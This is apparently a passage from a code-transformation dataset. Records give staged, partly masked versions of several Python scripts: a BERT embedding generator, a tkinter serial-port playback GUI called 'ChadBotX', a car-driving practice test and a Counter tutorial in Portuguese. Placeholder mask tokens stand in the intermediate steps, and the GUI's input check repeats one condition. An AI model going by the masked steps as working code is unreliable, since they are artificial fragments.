print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-5": "# -*- coding:utf-8 -*-\n# Author: hankcs\n# Date: 2019-01-13 15:01\nimport pickle\n\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\n\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\n\n# bc = BertClient(ip='192.168.1.88') # ip address of the server\nbc = BertClient(ip='127.0.0.1') # ip address of the GPU machine\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-')\n .replace('‘', '\\'')\n .replace('…', '.')\n .replace('坜', '壢')\n .replace('唛', '麦')\n .replace('ㄅㄆㄇㄈ', '呀呀')\n .replace('’', '\\''))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n # generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)\n #\n # generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)\n\n generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',\n embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',\n embed_fun=embed_sum)\n 
generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',\n embed_fun=embed_sum)\n\n # generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/train.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.train.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',\n # embed_fun=embed_sum)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
root.title('ChadBotX')
<|reserved_special_token_0|>
def pick_file():
newfilename = filedialog.askopenfilename(initialdir='/', title=
'Select file', filetypes=(('Byte files', '*.txt'), ('all files',
'*.*')))
filename.set(newfilename)
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
<|reserved_special_token_0|>
label.pack()
ttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text='File name:').pack()
<|reserved_special_token_0|>
ttk.Label(root, text='Port:').pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,
2), padx=(10, 10))
ttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)
)
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
root = tkinter.Tk()
root.title('ChadBotX')
MODE_RECORD = 1
MODE_PLAYBACK = 2
portname = tkinter.StringVar(root, '')
filename = tkinter.StringVar(root, '')
mode = tkinter.IntVar(root, 0)
action_button = tkinter.StringVar(root, 'Start')
def pick_file():
newfilename = filedialog.askopenfilename(initialdir='/', title=
'Select file', filetypes=(('Byte files', '*.txt'), ('all files',
'*.*')))
filename.set(newfilename)
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
image = Image.open('./chad.png')
photo = ImageTk.PhotoImage(image)
label = tkinter.Label(image=photo)
label.image = photo
label.pack()
ttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text='File name:').pack()
entry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))
ttk.Label(root, text='Port:').pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,
2), padx=(10, 10))
ttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)
)
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
<|reserved_special_token_1|>
import tkinter
from tkinter import ttk, filedialog, messagebox
import serial.tools.list_ports
from PIL import ImageTk, Image
from read_bytes import read
root = tkinter.Tk()
root.title('ChadBotX')
MODE_RECORD = 1
MODE_PLAYBACK = 2
portname = tkinter.StringVar(root, '')
filename = tkinter.StringVar(root, '')
mode = tkinter.IntVar(root, 0)
action_button = tkinter.StringVar(root, 'Start')
def pick_file():
newfilename = filedialog.askopenfilename(initialdir='/', title=
'Select file', filetypes=(('Byte files', '*.txt'), ('all files',
'*.*')))
filename.set(newfilename)
def get_ports():
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if not opt_mode or not opt_filename or not opt_mode:
return messagebox.showwarning('Error', 'Invalid input')
if opt_mode == MODE_PLAYBACK:
read(opt_filename, opt_port)
elif opt_mode == MODE_RECORD:
print('record ' + opt_filename + ' ' + opt_port)
action_button.set('Stop')
image = Image.open('./chad.png')
photo = ImageTk.PhotoImage(image)
label = tkinter.Label(image=photo)
label.image = photo
label.pack()
ttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text='File name:').pack()
entry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))
ttk.Label(root, text='Port:').pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,
2), padx=(10, 10))
ttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)
)
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
<|reserved_special_token_1|>
import tkinter
from tkinter import ttk, filedialog, messagebox
import serial.tools.list_ports
from PIL import ImageTk, Image
from read_bytes import read
root = tkinter.Tk()
root.title('ChadBotX')
# Define constants for mode selection
MODE_RECORD = 1
MODE_PLAYBACK = 2
# Define gui state
portname = tkinter.StringVar(root, "")
filename = tkinter.StringVar(root, "")
mode = tkinter.IntVar(root, 0)
action_button = tkinter.StringVar(root, "Start")
def pick_file():
# Open file picker and return name of file selcted
newfilename = filedialog.askopenfilename(initialdir = "/",title = "Select file",filetypes = (("Byte files","*.txt"),("all files","*.*")))
# tkinter.StringVar(root, filename)
filename.set(newfilename)
def get_ports():
# Get list of com ports
# https://pythonhosted.org/pyserial/tools.html
ports = serial.tools.list_ports.comports()
ports_str = []
for port in ports:
ports_str.append(port.device)
return ports_str
def start():
opt_mode = mode.get()
opt_filename = filename.get()
opt_port = portname.get()
if (not opt_mode or not opt_filename or not opt_mode):
return messagebox.showwarning("Error", "Invalid input")
if (opt_mode == MODE_PLAYBACK):
read(opt_filename, opt_port)
elif (opt_mode == MODE_RECORD):
print("record " + opt_filename + " " + opt_port)
action_button.set('Stop')
# Add widgets to window
image = Image.open("./chad.png")
photo = ImageTk.PhotoImage(image)
label = tkinter.Label(image=photo)
label.image = photo
label.pack()
ttk.Button(root, text="Choose file", command=pick_file).pack(pady=(10, 7))
ttk.Label(root, text="File name:").pack()
entry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))
ttk.Label(root, text="Port:").pack()
ttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0, 2), padx=(10, 10))
ttk.Radiobutton(root, text="Record", variable=mode, value=1).pack(pady=(5, 2))
ttk.Radiobutton(root, text="Playback", variable=mode, value=2).pack(pady=(2, 5))
ttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))
root.mainloop()
|
flexible
|
{
"blob_id": "6455741bbda42b9d84428545ddd50a5d1b54a7ba",
"index": 1376,
"step-1": "<mask token>\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\n<mask token>\n",
"step-2": "<mask token>\nroot.title('ChadBotX')\n<mask token>\n\n\ndef pick_file():\n newfilename = filedialog.askopenfilename(initialdir='/', title=\n 'Select file', filetypes=(('Byte files', '*.txt'), ('all files',\n '*.*')))\n filename.set(newfilename)\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\n<mask token>\nlabel.pack()\nttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))\nttk.Label(root, text='File name:').pack()\n<mask token>\nttk.Label(root, text='Port:').pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,\n 2), padx=(10, 10))\nttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)\n )\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\nroot.mainloop()\n",
"step-3": "<mask token>\nroot = tkinter.Tk()\nroot.title('ChadBotX')\nMODE_RECORD = 1\nMODE_PLAYBACK = 2\nportname = tkinter.StringVar(root, '')\nfilename = tkinter.StringVar(root, '')\nmode = tkinter.IntVar(root, 0)\naction_button = tkinter.StringVar(root, 'Start')\n\n\ndef pick_file():\n newfilename = filedialog.askopenfilename(initialdir='/', title=\n 'Select file', filetypes=(('Byte files', '*.txt'), ('all files',\n '*.*')))\n filename.set(newfilename)\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\nimage = Image.open('./chad.png')\nphoto = ImageTk.PhotoImage(image)\nlabel = tkinter.Label(image=photo)\nlabel.image = photo\nlabel.pack()\nttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))\nttk.Label(root, text='File name:').pack()\nentry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))\nttk.Label(root, text='Port:').pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,\n 2), padx=(10, 10))\nttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)\n )\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\nroot.mainloop()\n",
"step-4": "import tkinter\nfrom tkinter import ttk, filedialog, messagebox\nimport serial.tools.list_ports\nfrom PIL import ImageTk, Image\nfrom read_bytes import read\nroot = tkinter.Tk()\nroot.title('ChadBotX')\nMODE_RECORD = 1\nMODE_PLAYBACK = 2\nportname = tkinter.StringVar(root, '')\nfilename = tkinter.StringVar(root, '')\nmode = tkinter.IntVar(root, 0)\naction_button = tkinter.StringVar(root, 'Start')\n\n\ndef pick_file():\n newfilename = filedialog.askopenfilename(initialdir='/', title=\n 'Select file', filetypes=(('Byte files', '*.txt'), ('all files',\n '*.*')))\n filename.set(newfilename)\n\n\ndef get_ports():\n ports = serial.tools.list_ports.comports()\n ports_str = []\n for port in ports:\n ports_str.append(port.device)\n return ports_str\n\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n if not opt_mode or not opt_filename or not opt_mode:\n return messagebox.showwarning('Error', 'Invalid input')\n if opt_mode == MODE_PLAYBACK:\n read(opt_filename, opt_port)\n elif opt_mode == MODE_RECORD:\n print('record ' + opt_filename + ' ' + opt_port)\n action_button.set('Stop')\n\n\nimage = Image.open('./chad.png')\nphoto = ImageTk.PhotoImage(image)\nlabel = tkinter.Label(image=photo)\nlabel.image = photo\nlabel.pack()\nttk.Button(root, text='Choose file', command=pick_file).pack(pady=(10, 7))\nttk.Label(root, text='File name:').pack()\nentry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))\nttk.Label(root, text='Port:').pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0,\n 2), padx=(10, 10))\nttk.Radiobutton(root, text='Record', variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text='Playback', variable=mode, value=2).pack(pady=(2, 5)\n )\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\nroot.mainloop()\n",
"step-5": "import tkinter\nfrom tkinter import ttk, filedialog, messagebox\nimport serial.tools.list_ports\nfrom PIL import ImageTk, Image\nfrom read_bytes import read\n\nroot = tkinter.Tk()\nroot.title('ChadBotX')\n\n# Define constants for mode selection\nMODE_RECORD = 1\nMODE_PLAYBACK = 2\n\n# Define gui state\nportname = tkinter.StringVar(root, \"\")\nfilename = tkinter.StringVar(root, \"\")\nmode = tkinter.IntVar(root, 0)\naction_button = tkinter.StringVar(root, \"Start\")\n\ndef pick_file():\n # Open file picker and return name of file selcted\n\n newfilename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"Byte files\",\"*.txt\"),(\"all files\",\"*.*\")))\n # tkinter.StringVar(root, filename)\n filename.set(newfilename)\n \n\ndef get_ports():\n # Get list of com ports\n # https://pythonhosted.org/pyserial/tools.html\n\n ports = serial.tools.list_ports.comports()\n ports_str = []\n\n for port in ports:\n ports_str.append(port.device)\n\n return ports_str\n\ndef start():\n opt_mode = mode.get()\n opt_filename = filename.get()\n opt_port = portname.get()\n\n if (not opt_mode or not opt_filename or not opt_mode):\n return messagebox.showwarning(\"Error\", \"Invalid input\")\n\n if (opt_mode == MODE_PLAYBACK):\n read(opt_filename, opt_port)\n elif (opt_mode == MODE_RECORD):\n print(\"record \" + opt_filename + \" \" + opt_port)\n\n action_button.set('Stop')\n\n# Add widgets to window\nimage = Image.open(\"./chad.png\")\nphoto = ImageTk.PhotoImage(image)\nlabel = tkinter.Label(image=photo)\nlabel.image = photo\nlabel.pack()\n\nttk.Button(root, text=\"Choose file\", command=pick_file).pack(pady=(10, 7))\n\nttk.Label(root, text=\"File name:\").pack()\nentry = ttk.Entry(root, textvariable=filename).pack(pady=(0, 2))\n\nttk.Label(root, text=\"Port:\").pack()\nttk.Combobox(root, textvariable=portname, values=get_ports()).pack(pady=(0, 2), padx=(10, 10))\n\nttk.Radiobutton(root, text=\"Record\", variable=mode, value=1).pack(pady=(5, 2))\nttk.Radiobutton(root, text=\"Playback\", variable=mode, value=2).pack(pady=(2, 5))\n\nttk.Button(root, textvariable=action_button, command=start).pack(pady=(2, 10))\n\nroot.mainloop()",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
"""
CP1404 Practical
unreliable car test
"""
from unreliable_car import UnreliableCar
def main():
good_car = UnreliableCar("good car", 100, 80)
bad_car = UnreliableCar("bad car", 100, 10)
for i in range(10):
print("try to drive {} km".format(i))
print("{:10} drove {:2}km".format(good_car.name, good_car.drive(i)))
print("{:10} drove {:2}km".format(bad_car.name, bad_car.drive(i)))
print(good_car)
print(bad_car)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "f29ad02f3781c7a7d2a1f0c97626dd5c7ea2417e",
"index": 7867,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n good_car = UnreliableCar('good car', 100, 80)\n bad_car = UnreliableCar('bad car', 100, 10)\n for i in range(10):\n print('try to drive {} km'.format(i))\n print('{:10} drove {:2}km'.format(good_car.name, good_car.drive(i)))\n print('{:10} drove {:2}km'.format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n good_car = UnreliableCar('good car', 100, 80)\n bad_car = UnreliableCar('bad car', 100, 10)\n for i in range(10):\n print('try to drive {} km'.format(i))\n print('{:10} drove {:2}km'.format(good_car.name, good_car.drive(i)))\n print('{:10} drove {:2}km'.format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom unreliable_car import UnreliableCar\n\n\ndef main():\n good_car = UnreliableCar('good car', 100, 80)\n bad_car = UnreliableCar('bad car', 100, 10)\n for i in range(10):\n print('try to drive {} km'.format(i))\n print('{:10} drove {:2}km'.format(good_car.name, good_car.drive(i)))\n print('{:10} drove {:2}km'.format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\nCP1404 Practical\nunreliable car test\n\"\"\"\nfrom unreliable_car import UnreliableCar\n\n\ndef main():\n good_car = UnreliableCar(\"good car\", 100, 80)\n bad_car = UnreliableCar(\"bad car\", 100, 10)\n\n for i in range(10):\n print(\"try to drive {} km\".format(i))\n print(\"{:10} drove {:2}km\".format(good_car.name, good_car.drive(i)))\n print(\"{:10} drove {:2}km\".format(bad_car.name, bad_car.drive(i)))\n print(good_car)\n print(bad_car)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
print('--------------\n')
print(f"""Nasca de bacana:
{Counter('Nasca de bacana')}""")
print('--------------\n')
<|reserved_special_token_0|>
print(f'ocorrencias de palavras: {resultado2}')
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print('----------------------')
print(dir(Counter))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
lista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]
resultado = Counter(lista_1)
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
print('--------------\n')
print(f"""Nasca de bacana:
{Counter('Nasca de bacana')}""")
print('--------------\n')
texto = """Minha terra tem palmeiras, Onde canta o Sabiá;
As aves, que aqui gorjeiam, Não gorjeiam como lá.
Nosso céu tem mais estrelas, Nossas várzeas têm mais flores,
Nossos bosques têm mais vida, Nossa vida mais amores. """
palavras = texto.split()
resultado2 = Counter(palavras)
print(f'ocorrencias de palavras: {resultado2}')
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print('----------------------')
print(dir(Counter))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from collections import Counter
lista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]
resultado = Counter(lista_1)
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
print('--------------\n')
print(f"""Nasca de bacana:
{Counter('Nasca de bacana')}""")
print('--------------\n')
texto = """Minha terra tem palmeiras, Onde canta o Sabiá;
As aves, que aqui gorjeiam, Não gorjeiam como lá.
Nosso céu tem mais estrelas, Nossas várzeas têm mais flores,
Nossos bosques têm mais vida, Nossa vida mais amores. """
palavras = texto.split()
resultado2 = Counter(palavras)
print(f'ocorrencias de palavras: {resultado2}')
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print('----------------------')
print(dir(Counter))
<|reserved_special_token_1|>
"""
Module collections - Counter
Collections -> High-performance Container Datatypes
Counter -> Receives an iterable as a parameter and creates a Collections Counter
object, similar to a dictionary, whose keys are the elements of the list passed as
a parameter and whose values are the number of occurrences of each element.
"""
# Using the counter
from collections import Counter
# Example 1
# We can use any iterable; here we use a list
lista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]
resultado = Counter(lista_1) # key/value
print(f'resultado: {resultado} || seu tipo: {type(resultado)}')
# note: each list element became a key and the value is its number of occurrences
print('--------------\n')
# Example 2
print(f'Nasca de bacana: \n {Counter("Nasca de bacana")}')
print('--------------\n')
texto = """Minha terra tem palmeiras, Onde canta o Sabiá;
As aves, que aqui gorjeiam, Não gorjeiam como lá.
Nosso céu tem mais estrelas, Nossas várzeas têm mais flores,
Nossos bosques têm mais vida, Nossa vida mais amores. """
palavras = texto.split()
#print(palavras)
resultado2 = Counter(palavras)
print(f'ocorrencias de palavras: {resultado2}')
# the 'n' most common
print(f'as "5" mais comuns: {resultado2.most_common(5)}')
print("----------------------")
print(dir(Counter))
|
flexible
|
{
"blob_id": "4989d01f31ca034aacdda28eff56adb2e0bb15da",
"index": 1889,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\nprint('--------------\\n')\nprint(f\"\"\"Nasca de bacana: \n {Counter('Nasca de bacana')}\"\"\")\nprint('--------------\\n')\n<mask token>\nprint(f'ocorrencias de palavras: {resultado2}')\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\nprint('----------------------')\nprint(dir(Counter))\n",
"step-3": "<mask token>\nlista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]\nresultado = Counter(lista_1)\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\nprint('--------------\\n')\nprint(f\"\"\"Nasca de bacana: \n {Counter('Nasca de bacana')}\"\"\")\nprint('--------------\\n')\ntexto = \"\"\"Minha terra tem palmeiras, Onde canta o Sabiá;\nAs aves, que aqui gorjeiam, Não gorjeiam como lá.\nNosso céu tem mais estrelas, Nossas várzeas têm mais flores,\nNossos bosques têm mais vida, Nossa vida mais amores. \"\"\"\npalavras = texto.split()\nresultado2 = Counter(palavras)\nprint(f'ocorrencias de palavras: {resultado2}')\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\nprint('----------------------')\nprint(dir(Counter))\n",
"step-4": "<mask token>\nfrom collections import Counter\nlista_1 = [3, 7, 40, 3, 7, 3, 7, 16, 3, 40, 7, 21, 7]\nresultado = Counter(lista_1)\nprint(f'resultado: {resultado} || seu tipo: {type(resultado)}')\nprint('--------------\\n')\nprint(f\"\"\"Nasca de bacana: \n {Counter('Nasca de bacana')}\"\"\")\nprint('--------------\\n')\ntexto = \"\"\"Minha terra tem palmeiras, Onde canta o Sabiá;\nAs aves, que aqui gorjeiam, Não gorjeiam como lá.\nNosso céu tem mais estrelas, Nossas várzeas têm mais flores,\nNossos bosques têm mais vida, Nossa vida mais amores. \"\"\"\npalavras = texto.split()\nresultado2 = Counter(palavras)\nprint(f'ocorrencias de palavras: {resultado2}')\nprint(f'as \"5\" mais comuns: {resultado2.most_common(5)}')\nprint('----------------------')\nprint(dir(Counter))\n",
